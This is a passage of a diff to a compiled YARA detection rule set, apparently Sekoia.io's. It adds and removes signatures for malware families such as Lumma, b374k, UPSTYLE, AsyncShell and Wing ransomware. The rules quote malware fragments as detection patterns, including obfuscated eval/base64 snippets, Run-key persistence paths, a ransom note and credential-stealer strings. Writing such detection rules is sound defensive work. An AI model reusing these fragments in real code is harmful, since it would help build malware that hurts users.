+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ff5640b03ec3e535cdb86c2a0feb52d0c472928ff88a36ec9f66ac8aa07c9f69"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235885,59 +236780,70 @@ rule SEKOIA_Apt_Aptk47_Asyncshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Error executing command:" wide
-		$ = "Error occurred:" wide
-		$ = "Attempting to reconnect in {0} seconds..." wide
-		$ = "Exiting the application." wide
-		$ = "Server disconnected." wide
-		$ = "_CorExeMain"
+		$s1 = "[-] Error when changing folder." ascii
+		$s2 = "cmd.exe" wide
+		$s3 = "back slash find: " ascii
+		$s4 = "MOD_ALL:" wide
+		$s5 = "MOD_PERSISTENCE" wide
+		$s6 = "MOD_DESTRUCTION:" wide
+		$s7 = "MOD_RECONNECT" wide
+		$s8 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s9 = "powershell.exe -command \"([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')\"" wide
+		$s10 = "The command was executed successfully but no data was returned."
+		$s11 = "[-] TIMEOUT IN CREATEPROCESS, but all the processes in the name of: " ascii
+		$s12 = "we were well and truly killed." ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		( uint16be( 0 ) == 0x4d5a ) and filesize > 500KB and filesize < 3MB and 8 of them
 }
-rule SEKOIA_Tool_Bore_Rust_Any_Platform : FILE
+rule SEKOIA_Infostealer_Win_Lumma_Strings_Sept23 : FILE
 {
 	meta:
-		description = "Detects bore tunneling tool"
+		description = "Finds Lumma samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "c0ec0d72-de8e-4b96-9db6-a7a4e2f693f1"
-		date = "2023-07-28"
+		id = "45900760-c10d-40c0-a49a-c66358a8a66a"
+		date = "2023-09-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_bore_rust_any_platform.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c51d75088897aaffef904d560f750d780a0c814b89bf433a05189fbf7bb3285c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_lumma_strings_sept23.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "099dd81a72f8c9dac38fd0f9ab4e99b60f0e7742d6a64313e2989aa8955c01ec"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2023-10-31"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "bore_cli::" ascii
-		$ = "server handshake failed" ascii
-		$ = "server listening" ascii
-		$ = "connected to server" ascii
-		$ = "server requires authentication, but no client secret was provided" ascii
-		$ = "client port number too low" ascii
-		$ = "forwarding connection" ascii
-		$ = "Address of the remote server to expose local ports" ascii
+		$str10 = "CryptStringToBinaryA" ascii
+		$str11 = "WinHttpQueryDataAvailable" ascii
+		$str12 = "GetComputerNameExA" ascii
+		$str13 = "GetCurrentHwProfileW" ascii
+		$str14 = "ntdll.dll" wide
+		$str16 = "minkernel\\crts\\ucrt\\inc\\corecrt_internal_strtox.h" wide
+		$str17 = "xxxxxxxxxxx" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe or uint16be( 0 ) == 0x4d5a ) and filesize < 15MB and 5 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Rat_Win_Borat : FILE
+rule SEKOIA_Tool_Webshell_B374K_Strings : FILE
 {
 	meta:
-		description = "Detect the Borat RAT besed on specific strings"
+		description = "Detects b374k webshell"
 		author = "Sekoia.io"
-		id = "9f8badb3-ee8b-45d9-8515-c847351bb1f5"
-		date = "2022-04-08"
+		id = "f53fc668-e1fc-4b85-b850-59aceefb6418"
+		date = "2024-09-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_borat.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "53d6d9fe6b3218d97079e624379863d927d0b783b24acbda359b18daafb5162e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_webshell_b374k_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "1d27b23fceecbb9e854c41f6a8fb878e"
+		hash = "71fd853a3f3efc3dc2846e866187ee59"
+		hash = "187e001c32487d0d68197ddb7e7796c3"
+		hash = "6eac497dfc1020a8475e95542fad197e"
+		hash = "61c6a0bc15efa442853f04bb276ac96e"
+		logic_hash = "b085a50d50fc1fd06d6f75397cf1fa6fa1bc4a0d18b56ed3458990f4abde0632"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235945,68 +236851,55 @@ rule SEKOIA_Rat_Win_Borat : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "BoratRatMutex_Sa8XOfH1BudX" ascii
-		$str1 = "BoratRat.exe" ascii
-		$str2 = "BoratRat" ascii
-		$str3 = "CN=BoratRat" wide
-		$str4 = "Sending plugun to " wide
-		$str5 = "Save recorded file fail " wide
-		$str6 = "Sa8XOfH1BudX" wide
-		$str7 = "Alert when process activive." wide
-		$str8 = "disableDefedner" wide
-		$str9 = "bin\\Ransomware.dll" wide
-		$str10 = "disableDefedner" wide
+		$ = "$func('$x','ev'.'al'.'("
+		$ = "(ba'.'se'.'64'.'_de'.'co'.'de($x)))"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 7 of them
+		2 of them and filesize < 1MB
 }
-
-rule SEKOIA_Loader_Win_Revil_Loader
+rule SEKOIA_Apt_Uta0218_Upstyle_Backdoor_Strings : FILE
 {
 	meta:
-		description = "Detect the REvil loader using DDL side loading. The detected ressource is a legitimate executable used to load the malicious .dll containing the ransomware"
+		description = "Detects UPSTYLE backdoor"
 		author = "Sekoia.io"
-		id = "3c293e87-e2d7-475a-9536-8b991961fa11"
-		date = "2021-07-19"
+		id = "098fbad7-efaf-4198-83de-208c2ae16f89"
+		date = "2024-04-16"
 		modified = "2024-12-19"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/revil-ransomware-uses-dll-sideloading"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_revil_loader.yar#L4-L34"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "15680c5e5d801d65e581869ad88d89863c8a51e3f94a3d2f37c02c5fd14df07f"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_uta0218_upstyle_backdoor_strings.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bcba657b0b302f4b46f09bc4b815a581d22208b5d9f99e1233878f775241f92e"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e"
-		hash2 = "50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03"
-		hash3 = "66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8"
-		hash4 = "81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471"
-		hash5 = "aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7"
-		hash6 = "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e"
-		hash7 = "dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f"
-		hash8 = "df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e"
 
 	strings:
-		$crypto = ".\\crypto\\" ascii
-		$dropped_name1 = "MsMpEng.exe" wide
-		$dropped_name2 = "mpsvc.dll" ascii
+		$s1_1 = "f.write(b'''import base64;exec(base64.b64decode(b" ascii
+		$s1_2 = "atime=os.path.getatime(" ascii
+		$s2_1 = "exec(base64.b64decode(functioncode))" ascii base64
+		$s2_2 = "os.path.exists(systempth):" ascii base64
+		$s2_3 = ".read().replace(b\"\\x00\",b\" \")" ascii base64
+		$s3_1 = "if WRITE_FLAG:" ascii base64
+		$s3_2 = "re.search(SHELL_PATTERN" ascii base64
+		$s3_3 = "import threading,time,os,re,base64" ascii base64
 
 	condition:
-		all of ( $dropped_name* ) and #crypto > 100 and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a" )
+		filesize < 1500 and ( 2 of ( $s1_* ) or 2 of ( $s2_* ) or 2 of ( $s3_* ) )
 }
-rule SEKOIA_Ransomware_Win_Karma : FILE
+rule SEKOIA_Apt_Mustangpanda_Windows_Shellcode_Decryptionalgorithm : FILE
 {
 	meta:
-		description = "Detect the Karma ransomware payload"
+		description = "Decryption routine for Shellcode of MustangPanda"
 		author = "Sekoia.io"
-		id = "efd87a17-7c99-404a-8ea6-2f5c2121f9f2"
-		date = "2021-08-25"
+		id = "c9873a5f-97a6-477f-a1a0-650441c73444"
+		date = "2022-12-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_karma.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ef272be7ae5fea084120db95f7b002e9061d72442836e836ca43ddc7b461be4e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_windows_shellcode_decryptionalgorithm.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a2ad3bd4dcbee3e23762b674ee8b6717e7ece712b0128145518bfa5d2e4bd66a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236014,28 +236907,35 @@ rule SEKOIA_Ransomware_Win_Karma : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a1 = "KARMA" ascii
-		$u1 = "KARMA" wide
-		$u2 = "-ENCRYPTED.txt" wide
-		$u3 = "Encrypting directory:" wide
-		$u4 = "Encrypting file:" wide
-		$u5 = "Trying to import ECC public key..." wide
+		$chunk_1 = {
+        7E ??
+        8B 55 ??
+        53
+        56
+        8B 75 ??
+        57
+        8B 7D ??
+        4F
+        8D A4 24 ?? ?? ?? ??
+        8A 1C 11
+        30 1C 30
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 150KB and all of them
+		filesize < 8MB and all of them
 }
-rule SEKOIA_Apt_Tortoiseshell_Wateringhole_Script : FILE
+rule SEKOIA_Apt_Granitetyphoon_Sword2023_Strings : FILE
 {
 	meta:
-		description = "Detect's Tortoiseshell WH script"
+		description = "Detects Sword2023 malware based on strings"
 		author = "Sekoia.io"
-		id = "58c5ae66-fe09-497c-80bf-20feee4d95e7"
-		date = "2023-05-24"
+		id = "417b355f-9eb8-40ae-bc3b-f7f23b5ca63e"
+		date = "2023-05-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_tortoiseshell_wateringhole_script.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8ad886443b1bd17048054b57650d38cda1ffccc10fedfac86283a41daf956dc2"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_granitetyphoon_sword2023_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8644547f093295eeac30c9040796329a3e2222c06a942d14899545726c8bed78"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236043,89 +236943,59 @@ rule SEKOIA_Apt_Tortoiseshell_Wateringhole_Script : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "btoa(pluggin.toString())"
-		$ = "btoa(document.referrer)"
-		$ = "pluggin.push(navigator.plugins[i]"
-		$ = "navigator.language"
-		$ = "window.RTCPeerConnection"
-		$ = "sha256(canvas.toDataURL("
-		$ = "canvas.getContext('2d"
-		$ = "noop = function() {},"
+		$ = "TERM=linux"
+		$ = ";echo"
+		$ = "sh:time out"
+		$ = "sh:read stdout error"
+		$ = "/proc/sys/kernel/random/uuid"
 
 	condition:
-		5 of them and filesize < 10000
+		( uint32be( 0 ) == 0x7f454c46 ) and filesize < 100KB and all of them
 }
-rule SEKOIA_Ransomware_Win_Wing : FILE
+rule SEKOIA_Backdoor_Blueshell : FILE
 {
 	meta:
-		description = "Finds Wing ransomware samples based on specific strings"
+		description = "Detects BlueShell backdoor"
 		author = "Sekoia.io"
-		id = "c2fe8321-8013-4aa4-91a6-c0face3e6b52"
-		date = "2024-01-30"
+		id = "8f1cd966-c4d8-44f9-8cd5-4f5277332546"
+		date = "2023-09-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_wing.yar#L1-L52"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c9f373c12f4fb5efc29d0f293a2e0b46cf03c1abe124e9dd4118bef6c6e3f731"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_blueshell.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "348ae383f2aaef544951641dd7e2879afa23e37bdf429c6255254115bd3e10d5"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$fun01 = "LockBIT" ascii fullword
-		$fun02 = "BigEncrypt" ascii
-		$fun03 = "RunEncrypt" ascii
-		$fun04 = "AesEncrypt" ascii
-		$fun05 = "KeyGenerator" ascii
-		$fun06 = "GetUniqueKey" ascii
-		$fun07 = "SearchFolder" ascii
-		$fun08 = "ThreadFolders" ascii
-		$fun09 = "ContainsKeyword" ascii
-		$fun10 = "ReadMeMaker" ascii
-		$fun11 = "StopAndConfigureSqlServices" ascii
-		$fun12 = "WipeRecycleBin" ascii
-		$fun13 = "TelSender" ascii
-		$str01 = "AnyDesk" wide
-		$str02 = "firebird" wide
-		$str03 = "Acronis" wide
-		$str04 = "config \"" wide
-		$str05 = " start= demand" wide
-		$str06 = "' stopped and configured to start automatically." wide
-		$str07 = "Error processing service '" wide
-		$str08 = "$RECYCLE.BIN" wide
-		$str09 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$str10 = "UniqueID:" wide
-		$str11 = "PersonalID:" wide
-		$ran01 = "C:\\Readme.txt" wide
-		$ran02 = "C:\\LockBIT\\systemID" wide
-		$ran03 = "Your system has been encrypted by our team, and your files have been locked using our proprietary algorithm !" wide
-		$ran04 = "* Please read this message carefully and patiently *" wide
-		$ran05 = "* If you use any tools, programs, or methods to recover your files and they get damaged, we will not be responsible for any harm to your files !" wide
-		$ran06 = "* Note that your files have not been harmed in any way they have only been encrypted by our algorithm." wide
-		$ran07 = "Your files and your entire system will return to normal mode through the program we provide to you. No one but us will be able to decrypt your files !" wide
-		$ran08 = "* To gain trust in us, you can send us a maximum of 2 non-important files, and we will decrypt them for you free of charge." wide
-		$ran09 = "Please put your Unique ID as the title of the email or as the starting title of the conversation." wide
-		$ran10 = "* For faster decryption, first message us on Telegram. If there is no response within 24 hours, please email us *" wide
+		$s1 = "BlueShell" ascii
+		$s2 = "client.go" ascii
+		$s3 = "server ip" ascii
+		$s4 = "server port" ascii
+		$s5 = "reconnect wait time" ascii
+		$s6 = "shell" ascii
+		$s7 = "socks" ascii
+		$s8 = "socks5" ascii
+		$s9 = "GetInteractiveShell" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $fun* ) and 5 of ( $str* ) and 2 of ( $ran* ) ) or 12 of ( $fun* ) or 10 of ( $ran* ) or 8 of ( $ran* ) )
+		filesize < 11MB and all of them
 }
-rule SEKOIA_Tinyfluff_Nodejs : FILE
+rule SEKOIA_Apt_Toddycat_Tomberbil_Strings : FILE
 {
 	meta:
-		description = "Detect TinyFluff backdoor by OldGremlin"
+		description = "Detects TomBerBil password stealer"
 		author = "Sekoia.io"
-		id = "ca8cbd90-f275-4442-8354-b8b069e2efc3"
-		date = "2022-04-20"
+		id = "b16f4d35-ea59-4439-8ddb-2c0415b97b9b"
+		date = "2024-04-23"
 		modified = "2024-12-19"
-		reference = "https://blog.group-ib.com/oldgremlin_comeback"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tinyfluff_nodejs.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "bd0a6a3628f268a37ac9d708d03f57feef5ed55e"
-		hash = "bd0a6a3628f268a37ac9d708d03f57feef5ed55e"
-		logic_hash = "7fa07b6ea32b914887bdcada0f9fda086bc29a44bfdf27e7433ef589192f4b82"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_toddycat_tomberbil_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "92da6ba86cffec75a9af90a513840672b023c81baa9aedb2b706534cc39ecc09"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236133,138 +237003,133 @@ rule SEKOIA_Tinyfluff_Nodejs : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "TinyFluff.pdb" fullword ascii
-		$s2 = "node.exe" fullword wide
+		$ = "[+] Begin" ascii wide
+		$ = "[+] Delete File" ascii wide
+		$ = "[+] Current user" ascii wide
+		$ = "[+] Impersonate user" ascii wide
+		$ = "[+] Local State File" ascii wide
+		$ = "[>] Profile" ascii wide
 
 	condition:
-		filesize < 500KB and uint16be( 0 ) == 0x4d5a and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Storm_1811_Files_Dat
+rule SEKOIA_Generic_Sharpshooter_Payload_2 : FILE
 {
 	meta:
-		description = "Detects files used in a campaign performed by the intrusion set Storm-1811"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "8b14f276-0c39-422b-9b19-d96b139a7ae8"
-		date = "2024-06-10"
+		id = "02bc795f-b8e0-44d4-b475-310359867577"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/storm_1811_files_dat.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d1d5b76671cefe8b876ca8df50205a04ebbcd973f115919b901f6a7946492904"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_2.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c26779cd35d6430da3629df8b310356d663c05e82db0aca0fc974bc3a298c92e"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "RuntimeBroker" ascii fullword
-		$s2 = "InstallSpamFilters" ascii fullword
-		$s3 = "newfile333.txt" ascii fullword
-		$s4 = "Installing spam filter kb_outlook" ascii fullword
-		$s5 = "s.zip" ascii fullword
-		$s6 = "Update completed" ascii fullword
-		$s7 = "Updates installed" ascii fullword
-		$s8 = "update_log.tgz uploaded ok" ascii fullword
-		$s9 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii fullword
-		$s10 = "runtimebroker_connect" ascii fullword
+		$ = "var e={},i,b=0,c,x,l=0,a,r="
+		$ = "eval(plain);"
+		$ = "var plain = rc4("
 
 	condition:
-		5 of them
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Apt_Apt35_Iisraid_Strings : FILE
+rule SEKOIA_Apt_Spikedwine_Malicious_Hta
 {
 	meta:
-		description = "Detects APT35s ISSRaid implant"
+		description = "Detects malicious HTA used by SPIKEDWINE"
 		author = "Sekoia.io"
-		id = "ee42f406-0c7e-4385-9098-409611dbe0a5"
-		date = "2023-05-11"
+		id = "e4526142-d98a-bf35-9d2c-ca2e83638c4b"
+		date = "2024-02-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt35_iisraid_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "de2ebef5ab46136aa54b146dbd4198f69801f3414d1d239fc7983c5b3c0115c4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_spikedwine_malicious_hta.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "305896cde5d95c29de511541a961063730709d40d67a8788f084c17f181e3baf"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "CHttpModule::"
-		$ = "X-Forward-Verify"
-		$ = "X-Beserver-Verify"
+		$ = "<HTA:APPLICATION ID=" nocase
+		$ = "return _0x"
+		$ = "font-size: 18px;"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
+		all of them
 }
-rule SEKOIA_Hacktool_Defendercontrol_Strings : FILE
+rule SEKOIA_Apt_Susp_Apt28_Uac0063_Hatvibe
 {
 	meta:
-		description = "Detects DefenderControl based on strings"
+		description = "Detects some suspected UAC-0063/APT28 HTA loader"
 		author = "Sekoia.io"
-		id = "c6587a46-5f9b-4bf0-9231-9d2505293557"
-		date = "2022-03-08"
+		id = "c4e04671-e75f-40a4-a489-79c2ce91cf7a"
+		date = "2024-07-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_defendercontrol_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8372ab6f922471c28b528d908527f52d393cf6e6308d6acad882d6d5862df43c"
-		score = 75
-		quality = 80
-		tags = "FILE"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_susp_apt28_uac0063_hatvibe.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725"
+		logic_hash = "41e1f97e45bc42ad3057cc173d036806687223782e54997e7803c888ee394b09"
+		score = 65
+		quality = 28
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "www.sordum.org All Rights Reserved." wide
-		$ = "dControl.exe" wide
-		$ = "By BlueLife" wide
+		$ = "& temp(Mid(" ascii fullword
+		$ = ".InnerHTML =" ascii fullword
+		$ = "peceert" ascii fullword
+		$ = "window.setTimeout" ascii fullword
+		$ = "cmdline = Split(" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 600KB and all of them
+		3 of them
 }
-rule SEKOIA_Apt_Toddycat_Tomberbil_Strings : FILE
+
+rule SEKOIA_Downloader_Win_Andarloader : FILE
 {
 	meta:
-		description = "Detects TomBerBil password stealer"
+		description = "Detect the AndarLoader downloader used by Andariel"
 		author = "Sekoia.io"
-		id = "b16f4d35-ea59-4439-8ddb-2c0415b97b9b"
-		date = "2024-04-23"
+		id = "96dd737e-601c-4370-9fa6-4bbafafae203"
+		date = "2023-09-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_toddycat_tomberbil_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "92da6ba86cffec75a9af90a513840672b023c81baa9aedb2b706534cc39ecc09"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_win_andarloader.yar#L4-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "33e5490b9564333c27a2c23d7f0362c582ca3bd352cafde6b334dc376fd37762"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "[+] Begin" ascii wide
-		$ = "[+] Delete File" ascii wide
-		$ = "[+] Current user" ascii wide
-		$ = "[+] Impersonate user" ascii wide
-		$ = "[+] Local State File" ascii wide
-		$ = "[>] Profile" ascii wide
+		hash1 = "02135f60f3edff0b9baa4c20715ee6a80c94f282079bf879265f5e020d37cf88"
+		hash2 = "54ed7a7430974cc2ea694f49f3e637b835dcd24aa19d66af854ad47b87068c92"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b338ad077c7f5be85c33def7287198841d55af8cd1ad856fdcd16fdc78f18838" ) and filesize < 100KB
 }
-rule SEKOIA_Infostealer_Win_Stealc : FILE
+rule SEKOIA_Implant_Win_Flagpro : FILE
 {
 	meta:
-		description = "Find standalone Stealc sample based on decryption routine or characteristic strings"
+		description = "Detect the Flagpro malware used by Blacktech"
 		author = "Sekoia.io"
-		id = "aa78772e-9b31-40f3-84f4-b8302ea63a28"
-		date = "2023-02-12"
+		id = "08dd2de4-b359-424f-af04-7f294d519363"
+		date = "2022-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_stealc.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "60140c5a97494e6648dfce719ebce5644a3e05d4559d28874eb759b7d0e6a90e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_flagpro.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "eb1aba9924af474d6d890572a9bf72e0d1aa5dc31dd4cc34648195b0207ab4d6"
